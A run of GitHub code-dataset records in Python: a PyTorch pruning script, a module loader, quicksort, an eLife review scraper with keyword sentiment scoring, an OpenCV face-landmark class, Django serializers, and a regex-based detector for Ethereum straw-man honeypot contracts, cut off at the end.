transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n else:\n args.percent = [0.8, 0.92, 0.93, 0.94, 0.95, 0.99, 0.99, 0.93]\n args.num_pre_epochs = 5\n args.num_epochs = 20\n args.num_re_epochs = 5\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.49139968, 0.48215827, 0.44653124),\n (0.24703233, 0.24348505, 0.26158768))\n ])), shuffle=True, batch_size=args.batch_size, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('data', train=False, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.49139968, 0.48215827, 0.44653124),\n (0.24703233, 0.24348505, 0.26158768))\n ])), shuffle=True, batch_size=args.test_batch_size, **kwargs)\n\n model = LeNet().to(device) if args.dataset == \"mnist\" else AlexNet().to(device)\n optimizer = PruneAdam(model.named_parameters(), lr=args.lr, eps=args.adam_epsilon)\n\n train(args, model, device, train_loader, test_loader, optimizer)\n mask = apply_l1_prune(model, device, args) if args.l1 else apply_prune(model, device, args)\n print_prune(model)\n test(args, model, device, test_loader)\n retrain(args, model, mask, device, train_loader, test_loader, optimizer)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"bzantium/pytorch-admm-pruning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"47"} +{"seq_id":"30344287913","text":"# -*- coding: utf-8 -*-\n###\n### SmartModules > Smart Modules Loader\n###\nimport os\nimport glob\nimport importlib\n\nfrom lib.core.Config import *\nfrom lib.output.Logger import logger\n\n\nclass SmartModulesLoader:\n\n def __init__(self, sqlsess, services_config):\n self.sqlsess = sqlsess\n self.list_mods = list()\n \n for file in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):\n mod_name = os.path.basename(file)[:-3]\n if not mod_name.startswith('__') and not mod_name.startswith('SmartModule'):\n #mod = __import__(mod_name, globals(), locals())\n module = importlib.import_module('lib.smartmodules.'+mod_name)\n # Instantiate module and store instances in list\n self.list_mods.append(getattr(module, mod_name)(services_config))\n\n\n def __get_smartmodule(self, service):\n mod = list(filter(lambda x: x.service == service, self.list_mods))\n return mod[0] if mod else None\n\n\n def call_start_method(self, service):\n mod = self.__get_smartmodule(service.name)\n if not mod:\n return False\n\n logger.smartinfo('Running initialization method...')\n result = mod.start(service)\n if result:\n result.update_service(service)\n self.sqlsess.commit()\n return True\n\n\n def call_postcheck_method(self, method_name, service, cmd_output):\n \"\"\"\n :param service: Service object\n \"\"\"\n mod = self.__get_smartmodule(service.name)\n if not mod or not mod.is_valid_postcheck_method(method_name):\n return False\n method = mod.get_postcheck_method(method_name)\n\n logger.smartinfo('Running post-check method \"{method}\" ...'.format(method=method_name))\n result = method(cmd_output)\n if result:\n result.update_service(service)\n self.sqlsess.commit()\n return True\n\n\n#loader = SmartModulesLoader()\n#loader.callMethod('http', 'testMethod3', None)","repo_name":"yottaiq/jok3r","sub_path":"lib/smartmodules/SmartModulesLoader.py","file_name":"SmartModulesLoader.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"47"} +{"seq_id":"18222397340","text":"def Swap(arr, i, low):\n temp = arr[i]\n arr[i] = arr[low]\n arr[low]= temp\n\ndef Partition(arr,left, right):\n pivot = arr[right]\n low = left -1\n\n for i in range(left,right):\n if arr[i]<= pivot:\n low += 1\n Swap(arr, i, low)\n\n Swap(arr, right, low+1)\n return low+1\n\ndef QuickSort(arr , left, right):\n if left < right:\n position = Partition(arr, left, right)\n\n QuickSort(arr, left, position-1)\n QuickSort(arr, position+1, right)\n\n return arr\n\nif __name__ == \"__main__\":\n \n testArray = [8,4,23,42,16,15]\n print(f'Array: {testArray}')\n QuickSort(testArray,0,5)\n print(f'Sorted Array: {testArray}')\n\n\n","repo_name":"eslamakram/data-structures-and-algorithms","sub_path":"python/code_challenges/quick-sort/quick_sort/quick_sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"36117097936","text":"\"\"\" 06/08/23 by Victoria Hwang\n This script uses webscraping to extract peer review from eLife's published \n preprints, with the goal to calculate sentiment scores from these texts. \n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport time\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk import ngrams\n\ndef extract_assessment(topic, num_pages, rating):\n # Step 1: Setup \n\n # url = the webpage that lists all the papers. \n url = \"https://elifesciences.org/reviewed-preprints\"\n\n # For all the papers, find the link to the paper.\n base_url = \"https://elifesciences.org\"\n base_url2 = \"https://elifesciences.org/reviewed-preprints\"\n topics = []\n titles = []\n assessments = []\n scores = []\n ratings = []\n page_no = 0\n paper_no = 0\n\n for page in range(1, num_pages+1):\n \n result = requests.get(url)\n # create BeautifulSoup object to parse html content of webpage\n soup = BeautifulSoup(result.content, \"html.parser\")\n\n # Step 2. Get links to all the papers listed.\n\n # Get the list containing all the papers.\n papers_list = soup.find(\"ol\", class_=\"listing-list\")\n # Get all the papers in the list.\n papers = papers_list.find_all(\"li\", class_=\"listing-list__item\")\n page_no += 1\n print(\"Page:\", page_no)\n # For each paper, get it's link:\n for paper in papers:\n\n paper_no += 1\n\n paper_link = paper.find(\"a\", class_ =\"teaser__header_text_link\")\n paper_link_url = base_url + paper_link[\"href\"]\n\n try: \n # Using the paper link, access paper contents:\n paper_content = requests.get(paper_link_url)\n paper_soup = BeautifulSoup(paper_content.content, \"html.parser\")\n\n # Find the paper topic\n paper_topic = paper_soup.find(\"a\", class_=\"article-flag__link\")\n \n # Find the paper title\n paper_title = paper_soup.find(\"h1\", class_=\"title\")\n print(paper_title.text)\n\n # Find all paragraphs, keep the first one\n eLife_section = paper_soup.find(\"div\", class_=\"review-content_body\")\n \n eLife_paragraphs = eLife_section.find_all(\"p\")\n eLife_assessment = eLife_paragraphs[1]\n paragraph = eLife_assessment.text.strip() \n \n\n # Keep only the papers whose scores that match the given score\n paper_score = simpleAnalysis(paragraph)\n paper_rating = giveRating(paper_score)\n\n if rating == 'Any':\n if topic == \"Any\" or topic == paper_topic.text.strip():\n topics.append(paper_topic.text.strip())\n titles.append(paper_title.text.strip())\n assessments.append(paragraph)\n scores.append(paper_score)\n ratings.append(paper_rating)\n\n elif rating == \"Doubtful\" and paper_score < -0.5:\n if topic == \"Any\" or topic == paper_topic.text.strip():\n topics.append(paper_topic.text.strip())\n titles.append(paper_title.text.strip())\n assessments.append(paragraph)\n scores.append(paper_score)\n ratings.append(paper_rating)\n\n elif rating == \"Useful\" and -0.5 <= paper_score < 0:\n if topic == \"Any\" or topic == paper_topic.text.strip():\n topics.append(paper_topic.text.strip())\n titles.append(paper_title.text.strip())\n assessments.append(paragraph)\n scores.append(paper_score)\n ratings.append(paper_rating)\n \n elif rating == \"Good\" and 0 <= paper_score < 1:\n if topic == \"Any\" or topic == paper_topic.text.strip():\n topics.append(paper_topic.text.strip())\n titles.append(paper_title.text.strip())\n assessments.append(paragraph)\n scores.append(paper_score)\n ratings.append(paper_rating)\n \n elif rating == \"Excellent\" and paper_score == 1:\n if topic == \"Any\" or topic == paper_topic.text.strip():\n topics.append(paper_topic.text.strip())\n titles.append(paper_title.text.strip())\n assessments.append(paragraph)\n scores.append(paper_score)\n ratings.append(paper_rating)\n \n else:\n continue\n \n time.sleep(2)\n\n except AttributeError:\n # Handle the case when the attribute of the webpage is not found\n continue\n\n # Go to next page of papers\n new_url = base_url2 + \"?page=\" + str(page+1) # page numbering begins on page 2\n url = new_url\n\n # Create Database\n df = pd.DataFrame({\"Topic\":topics, \"Title\":titles, \"Rating\":ratings, \"Assessment\":assessments, \"Score\":scores}) \n print(df)\n \n df.to_csv(\"eLife.csv\", index=False) # Save Data to CSV file\n\n print(paper_no)\n\ndef simpleAnalysis(paragraph):\n\n best_words = [\"landmark, exceptional\"] # 1\n great_words = [ \"fundamental\", \"compelling\"] # 0.75\n good_words = [\"important\"] # 0.5\n pos_words = [\"valuable\", \"convincing\"] # 0.25\n neu_words = [\"useful\", \"solid\"] # 0\n neg_words = [\"partially supported\", \"further strengthened\", \"require additional\"] # -0.25\n bad_words = [\"inadequate\"] # -0.5\n worst_words = [\"incomplete\"] # -1\n\n num_best = 0\n num_great = 0\n num_good = 0 \n num_pos = 0\n num_neu = 0\n num_neg = 0\n num_bad = 0\n num_worst = 0\n \n stop_words = set(stopwords.words('english')) # remove unecessary words\n num_words = 0 # initialize new counter for paragraph after stop words are filtered\n paragraph = paragraph.lower()\n\n # Generate n-grams from tokenized words\n tokens = word_tokenize(paragraph)\n n = 2 # Change this to the desired n-gram size\n ngrams_list = list(ngrams(tokens, n))\n\n # Check words:\n for word in tokens:\n if word not in stop_words:\n num_words += 1\n if word in best_words:\n num_best += 1\n elif word in great_words:\n num_great += 1\n elif word in good_words:\n num_good += 1\n elif word in pos_words:\n num_pos += 1\n elif word in neu_words:\n num_neu += 1\n elif word in neg_words:\n num_neg += 1\n elif word in bad_words:\n num_bad += 1\n elif word in worst_words:\n num_worst += 1\n\n # Check phraes:\n for ngram in ngrams_list:\n phrase = \" \".join(ngram)\n if phrase in neg_words:\n num_neg += 1\n\n \n meaningful_words = num_best+num_great+num_good+num_pos+num_neu+num_neg+num_bad+num_worst\n score = ((num_best)+(0.75*num_great)+(0.5*num_good)+(0.25*num_pos)+\\\n (0*num_neu)+(-0.25*num_neg)+(-0.5*num_bad)+(-1*num_worst)) / meaningful_words\n \n return score\n\ndef giveRating(paper_score): # a simple method to convert numerical rating into description\n rating = \"\"\n\n if paper_score < -0.5:\n rating = \"Doubtful\"\n elif -0.5 <= paper_score < 0:\n rating = \"Useful\"\n elif 0 <= paper_score < 1:\n rating = \"Good\"\n elif paper_score == 1:\n rating = \"Excellent\"\n \n return rating \n \n \ndef main():\n #format: extract_assessment(\"Topic, number pages to search, paper rating\")\n extract_assessment(\"Any\", 29, \"Any\")\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","repo_name":"vickyhwang77/sentimentAnalysis_PeerReview","sub_path":"eLifeScraper.py","file_name":"eLifeScraper.py","file_ext":"py","file_size_in_byte":8120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25204079898","text":"from typing import List\nimport cv2\nimport numpy\nfrom .detection_strategy import LandmarksDetectionStrategy\n\nclass OpenCVStrategy(LandmarksDetectionStrategy):\n def __init__(self, frame_dimensions=(640, 480), landmark_model_path=\"/home/eduardonunes/workspace/org_tcc/GSOC2017/data/lbfmodel.yaml\"):\n self.width = frame_dimensions[0]\n self.height = frame_dimensions[1]\n\n face_detect_path = cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\"\n self.cas = cv2.CascadeClassifier(face_detect_path)\n\n self.face_markers = cv2.face.createFacemarkLBF()\n self.face_markers.loadModel(landmark_model_path)\n\n def get_the_closest_face(self, faces):\n closest_face = numpy.zeros(shape=(1,4))\n for face in faces:\n if face[2] > closest_face[0][2]:\n closest_face[0] = face\n return closest_face \n \n def draw_detected_faces(self, frame, faces):\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),1)\n\n def draw_face_landmarks_numbers(self, frame, shape):\n label = 0\n for (x, y) in shape:\n font = cv2.FONT_HERSHEY_SIMPLEX \n fontScale = 0.3\n color = (0, 255, 255) \n thickness = 1\n cv2.putText(frame, str(label), (round(x),round(y)), font, fontScale, color, thickness, cv2.LINE_AA, False)\n label += 1\n\n def draw_face_landmarks(self, frame, shape):\n for (x, y) in shape:\n cv2.circle(frame, (round(x), round(y)), 2, (0, 255, 255), -1)\n\n def get_face_landmarks(self, frame: List) -> List:\n faces = self.cas.detectMultiScale(frame, \n scaleFactor=1.05, \n minNeighbors=3, \n flags=cv2.CASCADE_SCALE_IMAGE, \n minSize=(int(self.width/5), int(self.width/5)))\n\n shape = None \n\n if type(faces) is numpy.ndarray and faces.size > 0: \n closest_face = self.get_the_closest_face(faces)\n\n _, landmarks = self.face_markers.fit(frame, faces=closest_face)\n\n shape = landmarks[0][0]\n\n self.draw_face_landmarks(frame, shape)\n \n self.draw_detected_faces(frame, faces)\n \n return shape\n","repo_name":"ednunes/tcc-project","sub_path":"addon/algorithms/opencv_strategy.py","file_name":"opencv_strategy.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27729508323","text":"from rest_framework import serializers\nfrom app.models import User, Record\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = [\n 'pk',\n 'created',\n 'first_name',\n 'last_name'\n ]\n\n def validate_first_name(self, value):\n qs = User.objects.filter(first_name__iexact=value)\n if qs.exists():\n raise serializers.ValidationError(\"User exists\")\n return value\n\n def create(self, validated_data):\n return User.objects.create(**validated_data)\n\nclass RecordSerializer(serializers.ModelSerializer):\n class Meta:\n model = Record\n fields = [\n 'pk',\n 'created',\n 'title',\n 'artist',\n 'genre',\n 'year',\n 'quanity_available'\n ]\n\n def create(self, validated_data):\n return Record.objects.create(**validated_data)","repo_name":"bowenbrinegar/django-sql-record-store","sub_path":"api/app/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40649521896","text":"import re\r\nfrom loadJson import load_json\r\n\r\n'''\r\n实际上, 稻草人合约是跟行为有关的, 其实应该是需要确定一下: 合约创建者创建的合约中的稻草人合约是否与传入地址对应的合约内容一致. 如果不一致就是稻草人。\r\n对于在constructor函数中初始化的地址还可以从字节码中找到对应的地址, 也即只需要创建者创建合约这一次行为;\r\n而对于以onlyOwner权限的函数传入的地址来说, 创建者还需要一次函数调用的行为。\r\n比如,\r\n0xf331f7887d31714dce936d9a9846e6afbe82e0a0这个地址就是在constructor中实现了稻草人合约的初始化, 但合约内容与对应地址内容是一致的, 因此就属于非蜜罐。\r\n'''\r\n\r\npattern_exclude_1 = re.compile(r'(.*)library SafeMath\\s*(.*)')\r\npattern_exclude_noPayable = re.compile(r'(.*payable.*)') #payable的强制要求是从0.4.x才要求的。\r\n# pattern_exclude_noInterface = re.compile(r'function([\\s\\S]*?)[)];')\r\npattern_exclude_noInterface = re.compile(r'function([^{}]*?)[)];')\r\npattern_compiler = re.compile(r'pragma solidity \\^([.0-9]*);')\r\n\r\n#稻草人合约的匹配 - position 1\r\npattern_contractName = re.compile(r'(.*)contract\\s+(.*)')\r\npattern_2_constructor_2 = re.compile(r\"constructor(\\s*)[(](.*)address (.*)[)]\") #可能也存在换行的情况, 还没有考虑进来。 参考0xf331f7887d31714dce936d9a9846e6afbe82e0a0这个良性合约地址中的function Ico(\r\npattern_2_function_onlyOwner_3 = re.compile(r'function (.*)[(](.*)address (.*)[)](.*)(\\n*)(.*)(\\n*)(.*)onlyOwner')\r\n# pattern_2_function_onlyOwner_3 = re.compile(r'function (.*)[(](.*)address (.*)[)](.*)onlyOwner')\r\n\r\n#稻草人合约的匹配 - position 2\r\npattern_3_delegatecall_1 = re.compile(r'.delegatecall[(](.*)[)]')\r\npattern_4_transfer_1 = re.compile(r'.transfer[(](.*)[)]')\r\npattern_4_send_2 = re.compile(r'.send[(](.*)[)]')\r\npattern_4_call_3 = re.compile(r'.call.value[(](.*)[)][(][)]')\r\n\r\n#稻草人合约的匹配 - position 3\r\n'''第三种其实就是隐藏状态更新,打算合并到隐藏状态更新中写''' #真就是在HSU中实现的!\r\n\r\ndef delect_more_space_row(vcode):\r\n return \"\".join([s for s in vcode.splitlines(True) if s.strip()])\r\n\r\ndef function_or_modifier_split(vcode, splitStr='function'):\r\n # 1-1. 在无注释的代码中, 按function 划分\r\n vcode_split_by_Function_list = vcode.split(splitStr)\r\n # print('vcode_split_by_Function_list is: ',vcode_split_by_Function_list)\r\n function_code_list = []\r\n for i in vcode_split_by_Function_list[1:]:\r\n # if (i.strip(' ')[-1] != '\\n'):\r\n # print(\"i is: \",i)\r\n left_index = 0\r\n right_index = -1\r\n # 大括号或说花括号没太有可能成为智能合约中使用的字符\r\n left_BigBucket_indexs = [i.start() for i in re.finditer('{', i)]\r\n # print(left_BigBucket_indexs, \"*********\")\r\n right_BigBucket_indexs = [i.start() for i in re.finditer('}', i)]\r\n # print(right_BigBucket_indexs)\r\n if ((left_BigBucket_indexs == []) and (right_BigBucket_indexs == [])) or \\\r\n ((left_BigBucket_indexs==[]) and (right_BigBucket_indexs!=[])) or \\\r\n (right_BigBucket_indexs[0] 2) and ((i[:2] == '//') or (i[:4] == '/**/')):\r\n # vcode = vcode.replace(i, '')\r\n comment_record_list.append(i)\r\n rows_len -= 1\r\n comment_record_list.sort(reverse=True)\r\n # print('comment_record_list is: ',comment_record_list)\r\n for comment_record in comment_record_list:\r\n vcode = vcode.replace(comment_record, '')\r\n # print(rows_len) #排除注释后的行数\r\n # if rows_len > max:\r\n # max = rows_len\r\n # if rows_len < min:\r\n # min = rows_len\r\n # print(min, max)\r\n # 用超于当前蜜罐最大有效行数的三倍去定义复杂逻辑, 超过就等价于复杂逻辑, 对新手黑客不具有吸引力。\r\n if rows_len > 450:\r\n # continue\r\n return 0\r\n\r\n # 进一步删除注释\r\n vcode = vcode.replace('/**/', '')\r\n pattern_with_comment = re.compile(r'(//.*)')\r\n with_comment_re = re.findall(pattern_with_comment, vcode, flags=0)\r\n for i in with_comment_re:\r\n vcode = vcode.replace(i, '')\r\n\r\n # SafeMath_re = re.findall(pattern_exclude_1, vcode, flags=0)\r\n # # print(SafeMath_re)\r\n # # 其实, 还应该\r\n # SafeMath_exist = False\r\n # if (SafeMath_re != []):\r\n # for i in SafeMath_re:\r\n # if i[0] == '':\r\n # SafeMath_exist = True\r\n # break\r\n # if SafeMath_exist == True:\r\n # # continue\r\n # return 0\r\n\r\n if rows_len > 150:\r\n SafeMath_re = re.findall(pattern_exclude_1, vcode, flags=0)\r\n # print(SafeMath_re)\r\n # 其实, 还应该\r\n SafeMath_exist = False\r\n if (SafeMath_re != []):\r\n for i in SafeMath_re:\r\n if i[0] == '':\r\n SafeMath_exist = True\r\n break\r\n if SafeMath_exist == True:\r\n # continue\r\n return 0\r\n\r\n Interface_re = re.findall(pattern_exclude_noInterface, vcode, flags=0)\r\n # print(hp, \"&&&&&&&&&&&&&&\",Interface_re)\r\n if Interface_re != []:\r\n # continue\r\n return 0\r\n\r\n # # token-2 不太严谨, 如果后续影响检测,可考虑删除,这里的目的纯粹是为了排除复杂逻辑\r\n # token_re_2 = re.findall(pattern_exclude_noToken_2, vcode, flags=0)\r\n # # print(len(token_re))\r\n # # print(token_re)\r\n # if (token_re_1 != []) and (token_re_2 != []):\r\n # # continue\r\n # return 0\r\n\r\n list_compiler = re.findall(pattern_compiler, vcode, flags=0)\r\n if len(list_compiler) != 0:\r\n minor_version = int(list_compiler[0].split('.')[1])\r\n patch_version = int(list_compiler[0].split('.')[2])\r\n minor_patch_v = minor_version * 100 + patch_version\r\n if minor_patch_v >= 400:\r\n payable_re_list = re.findall(pattern_exclude_noPayable, vcode, flags=0)\r\n if payable_re_list == []:\r\n # continue\r\n return 0\r\n\r\n return vcode\r\n\r\ndef SMC_deal(hp, vcode):\r\n is_SMC_hp = False\r\n\r\n transfer_1_list = re.findall(pattern_4_transfer_1, vcode, flags=0)\r\n send_2_list = re.findall(pattern_4_send_2, vcode, flags=0)\r\n call_3_list = re.findall(pattern_4_call_3, vcode, flags=0)\r\n if ((len(transfer_1_list) == 0) and (len(send_2_list) == 0) and (len(call_3_list) == 0)):\r\n return is_SMC_hp\r\n\r\n # 1. 获取contract name\r\n contractName_set = set()\r\n contractName_list_temp = re.findall(pattern_contractName, vcode, flags=0)\r\n for contractName in contractName_list_temp:\r\n if contractName[0] != '':\r\n continue\r\n _contract_name = contractName[1].split('{')[0].strip()\r\n contractName_set.add(_contract_name)\r\n # print(contractName_set,'**********')\r\n\r\n # 合约大于等于2个时, 执行构造函数型和onlyOwner型的检测\r\n first_two_detect_isOver = False\r\n if len(contractName_set) >= 2:\r\n # 2. 分割函数 (不考虑modifier)\r\n function_code_list = function_or_modifier_split(vcode, 'function') #2-tuple List\r\n function_code_list_need = function_or_modifier_split(vcode, 'constructor(') #2-tuple List\r\n function_code_list_modifier = function_or_modifier_split(vcode, 'modifier ') #2-tuple List\r\n # 为constructor(分割后的结果加上(\r\n function_code_list_need = [('('+each_fNeed[0],each_fNeed[1]) for each_fNeed in function_code_list_need]\r\n\r\n # 2-1. 全局代码\r\n global_var_code = vcode\r\n for function_code in function_code_list:\r\n global_var_code = global_var_code.replace(function_code[0] + function_code[1], '')\r\n for function_code_need in function_code_list_need:\r\n global_var_code = global_var_code.replace(function_code_need[0] + function_code_need[1], '')\r\n for function_code_mf in function_code_list_modifier:\r\n global_var_code = global_var_code.replace(function_code_mf[0] + function_code_mf[1], '')\r\n # print(global_var_code,\"WWWWWWW\")\r\n # 2-2. 从全局代码中检查-合约初始定义\r\n for each_cN in contractName_set:\r\n pattern_cN_init = re.compile(r'(.*)(' + each_cN + r'\\s+.*);')\r\n cN_init_result = re.findall(pattern_cN_init, global_var_code, flags=0)\r\n cN_init_name_set = set()\r\n for each_cN_init in cN_init_result:\r\n if (each_cN_init[0] != '') and (each_cN_init[0][-1] != ' ') and \\\r\n (each_cN_init[0][-1] != '\\n') and (each_cN_init[0][-1] != '\\t'):\r\n continue\r\n # 获取合约初始定义的名称\r\n cN_init_name_set.add(each_cN_init[1].split('=')[0].strip())\r\n # 必须要有全局的初始化\r\n if cN_init_name_set == set():\r\n first_two_detect_isOver = True #意味着一定不是构造函数型和onlyOwner型, 但是delegatecall还没检查\r\n\r\n if first_two_detect_isOver == False:\r\n # 3. 对构造函数和onlyOwner权限函数 - 只保留这两类函数\r\n for each_func_2_tuple in function_code_list:\r\n # 与合约同名函数-构造函数\r\n for each_contract_name in contractName_set:\r\n if (each_func_2_tuple[0].split('(')[0].strip() == each_contract_name):\r\n function_code_list_need.append(each_func_2_tuple)\r\n # onlyOwner权限函数\r\n if 'onlyOwner' in each_func_2_tuple[0]:\r\n function_code_list_need.append(each_func_2_tuple)\r\n # print(function_code_list_need)\r\n # 4. 为每个函数检查形参是否用于初始化合约\r\n for func_need_2_tuple in function_code_list_need:\r\n # 获取函数形参地址集合\r\n func_addr_para_set = set()\r\n para_content = func_need_2_tuple[0].split('(')[1].split(')')[0]\r\n # 切分每个形参\r\n para_list = para_content.split(',')\r\n for each_para in para_list:\r\n if 'address ' in each_para:\r\n func_addr_para_set.add(each_para.split()[-1])\r\n if func_addr_para_set == set():\r\n continue\r\n # 函数体中检查对初始化合约的实例化\r\n for cN_init_str in cN_init_name_set:\r\n # 001. 分割\r\n cN_init_str_list = cN_init_str.split()\r\n if len(cN_init_str_list) < 2:\r\n continue\r\n # 002. 模板 - 获取结果为初始化的地址内容, 需要与形参集合求交集\r\n if (\")\" in cN_init_str_list[-1]) or (\"(\" in cN_init_str_list[-1]):\r\n continue\r\n cN_instance_template = re.compile(cN_init_str_list[-1] + '\\s*=\\s*' + cN_init_str_list[0] + '[(](.*)[)]')\r\n cN_instance_result = re.findall(cN_instance_template, func_need_2_tuple[1], flags=0)\r\n if len(cN_instance_result) != 1:\r\n continue\r\n # 不为空的话, 只能有一个参数, 即列表长度为1:\r\n if cN_instance_result[0] in func_addr_para_set:\r\n print(hp, ' has a high possibility to be a SMC hp (constructor or onlyOwner type).')\r\n is_SMC_hp = True\r\n return is_SMC_hp\r\n\r\n # if hp == r'0xa91a453abde404a303fb118c46e00c8f630216a9':\r\n delegatecall_1_list = re.findall(pattern_3_delegatecall_1, vcode, flags=0)\r\n # transfer_1_list = re.findall(pattern_4_transfer_1, vcode, flags=0)\r\n # send_2_list = re.findall(pattern_4_send_2, vcode, flags=0)\r\n # call_3_list = re.findall(pattern_4_call_3, vcode, flags=0)\r\n if (len(delegatecall_1_list) != 0): #and \\\r\n # ((len(transfer_1_list) != 0) or (len(send_2_list) != 0) or (len(call_3_list) != 0)):\r\n print(hp, ' has a high possibility to be a SMC hp (delegatecall type).')\r\n is_SMC_hp = True\r\n return is_SMC_hp\r\n\r\n return is_SMC_hp\r\n\r\n\r\ndef main():\r\n hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_all8tyes_truePositive.json'\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_more13_FromXGBootst_truePositive.json'\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_all8tyes_FalsePositive.json'\r\n hp_8type_dict = load_json(hp_8type_path)\r\n for hp, vcode in hp_8type_dict.items():\r\n # print(hp)\r\n # if hp == r'0x95be22039da3114d17a38b9e7cd9b3576de83924':\r\n\r\n # 删除多行注释\r\n # print(hp)\r\n patterrn_multiLine_comment = re.compile(r\"/[*]([\\s\\S]*?)[*]/\")\r\n multiLine_comments = re.findall(patterrn_multiLine_comment, vcode, flags=0)\r\n # print(multiLine_comments)\r\n for multiLine in multiLine_comments:\r\n vcode = vcode.replace(multiLine, '')\r\n\r\n rows_list = vcode.split('\\n')\r\n rows_len = len(rows_list)\r\n # print(rows_list)\r\n # print(len(rows_list))\r\n for i in rows_list:\r\n i = i.strip()\r\n # if (i == '') or (i[:2] == '//') or (i[:4] == '/**/'):\r\n if (len(i) > 2) and ((i[:2] == '//') or (i[:4] == '/**/')):\r\n vcode = vcode.replace(i, '')\r\n rows_len -= 1\r\n # print(vcode)\r\n # print(rows_len) #排除注释后的行数\r\n # if rows_len > max:\r\n # max = rows_len\r\n # if rows_len < min:\r\n # min = rows_len\r\n # print(min, max)\r\n # 用超于当前蜜罐最大有效行数的三倍去定义复杂逻辑, 超过就等价于复杂逻辑, 对新手黑客不具有吸引力。\r\n if rows_len > 450:\r\n continue\r\n\r\n SafeMath_re = re.findall(pattern_exclude_1, vcode, flags=0)\r\n # print(SafeMath_re)\r\n # 其实, 还应该\r\n SafeMath_exist = False\r\n if (SafeMath_re != []):\r\n for i in SafeMath_re:\r\n if i[0] == '':\r\n SafeMath_exist = True\r\n break\r\n if SafeMath_exist == True:\r\n continue\r\n\r\n Interface_re = re.findall(pattern_exclude_noInterface, vcode, flags=0)\r\n # print(hp, \"&&&&&&&&&&&&&&\",Interface_re)\r\n if Interface_re != []:\r\n continue\r\n\r\n payable_re_list = re.findall(pattern_exclude_noPayable, vcode, flags=0)\r\n if payable_re_list == []:\r\n continue\r\n\r\n contractName_list = re.findall(pattern_contractName, vcode, flags=0)\r\n constructor_list_1 = []\r\n for contractName in contractName_list:\r\n if contractName[0] != '':\r\n continue\r\n pattern_2_constructor_1 = re.compile(r'function ' + contractName[1].strip() + '([ ]*)[(](.*)address (.*)[)]')\r\n constructor_list_1 += re.findall(pattern_2_constructor_1, vcode, flags=0)\r\n constructor_list_2 = re.findall(pattern_2_constructor_2, vcode, flags=0)\r\n if (len(constructor_list_1) != 0) or (len(constructor_list_2) != 0):\r\n print(hp, ' has a high possibility to be a SMC hp (constructor type).')\r\n\r\n constructor_list_3 = re.findall(pattern_2_function_onlyOwner_3, vcode, flags=0)\r\n if (len(constructor_list_3) != 0):\r\n for list_i in range(len(constructor_list_3)):\r\n addr_name = constructor_list_3[list_i][2]\r\n pattern_2_function_onlyOwner_addrName = re.compile(r'(.*)=(.*)[(]'+addr_name+'[)];')\r\n if (len(re.findall(pattern_2_function_onlyOwner_addrName, vcode, flags=0))!=0):\r\n print(hp, ' has a high possibility to be a SMC hp (function_onlyOwner type).')\r\n break\r\n\r\n\r\n # if hp == r'0xa91a453abde404a303fb118c46e00c8f630216a9':\r\n delegatecall_1_list = re.findall(pattern_3_delegatecall_1, vcode, flags=0)\r\n transfer_1_list = re.findall(pattern_4_transfer_1, vcode, flags=0)\r\n send_2_list = re.findall(pattern_4_send_2, vcode, flags=0)\r\n call_3_list = re.findall(pattern_4_call_3, vcode, flags=0)\r\n if (len(delegatecall_1_list) != 0) and \\\r\n ((len(transfer_1_list) != 0) or (len(send_2_list) != 0) or (len(call_3_list) != 0)):\r\n print(hp, ' has a high possibility to be a SMC hp (delegatecall type).')\r\n\r\n # break\r\n\r\nif __name__ == '__main__':\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_all8tyes_truePositive.json'\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_more13_FromXGBootst_truePositive.json'\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_all8tyes_FalsePositive.json'\r\n # hp_dict = load_json(hp_8type_path)\r\n\r\n # paper_new_hp_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_paper_new_addr2SouceCode.json'\r\n # hp_dict = load_json(paper_new_hp_path)\r\n for hp, vcode in hp_dict.items():\r\n # print(hp)\r\n # if hp == r'0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4':\r\n\r\n vcode = common_deal(hp, vcode)\r\n if vcode == 0:\r\n continue\r\n\r\n SMC_deal(hp, vcode)\r\n\r\n\r\n'''\r\n# honeypots_all8tyes_truePositive.json 除HSU式的SMC蜜罐(见HSU检测脚本), 